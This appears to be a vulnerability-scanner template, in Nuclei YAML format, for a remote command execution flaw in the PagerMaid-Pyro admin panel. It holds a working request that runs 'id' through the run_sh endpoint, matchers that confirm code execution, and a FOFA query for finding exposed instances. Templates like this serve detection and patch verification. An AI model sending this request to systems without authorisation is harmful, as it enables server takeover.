http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - uid=
            - gid=
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /pagermaid/api/run_sh?cmd=id HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
id: PagerMaid-Pyro-run_sh-RCE
info:
    author: Superhero
    description: |-
        fofa: title="PagerMaid-Pyro" && body="href=\"https://xtaolabs.com/pagermaid-logo.png\""
        PagerMaid-Pyro后台管理系统 run_sh 存在远程命令执行漏洞。攻击者可以通过漏洞执行任意命令从而获取服务器权限，可能导致内网进一步被攻击。
    name: PagerMaid-Pyro后台管理系统 run_sh 远程命令执行漏洞
    reference:
        - https://mp.weixin.qq.com/s/FMZUrpivjiK5_fEoo50qYw
    severity: high
    tags: []
